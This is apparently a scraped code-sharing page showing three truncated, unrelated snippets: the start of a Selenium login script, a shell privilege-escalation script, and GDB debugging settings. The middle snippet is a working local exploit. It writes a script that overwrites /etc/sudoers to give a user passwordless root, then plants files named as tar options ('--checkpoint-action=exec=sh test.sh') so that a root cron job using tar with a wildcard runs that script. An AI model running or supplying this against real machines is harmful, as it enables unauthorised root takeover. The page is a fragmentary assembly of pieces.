This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from selenium import webdriver | |
from subprocess import Popen, PIPE | |
import sys | |
USERNAME="" | |
PASSWORD="" | |
CHROMEDRIVER_LOCATION="" | |
for i,x in enumerate(sys.argv): | |
if x in ["-u","--user"]: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/ | |
// This will replace sudoers. Add your user to <INSERT YOUR USER HERE> | |
echo 'echo "Defaults env_reset" > /etc/sudoers' >> test.sh | |
echo 'echo "Defaults mail_badpass" >> /etc/sudoers' >> test.sh | |
echo 'echo "Defaults secure_path=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin\" ">> /etc/sudoers' >> test.sh | |
echo 'echo "root ALL=(ALL:ALL) ALL" >> /etc/sudoers' >> test.sh | |
echo 'echo "%sudo ALL=(ALL:ALL) ALL" >> /etc/sudoers' >> test.sh | |
echo 'echo "<INSERT YOUR USER HERE> ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' >> test.sh | |
echo "" > "--checkpoint-action=exec=sh test.sh" | |
echo "" > --checkpoint=1 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
set disassembly-flavor intel | |
unset env LINES | |
unset env COLUMNS | |
// if x86 | |
define hook-stop | |
echo \n=========================================\n | |
i r $eax $ebx $ecx $edx $edi $esi $ebp | |
echo =========================================\n | |
x/5i $pc-5 |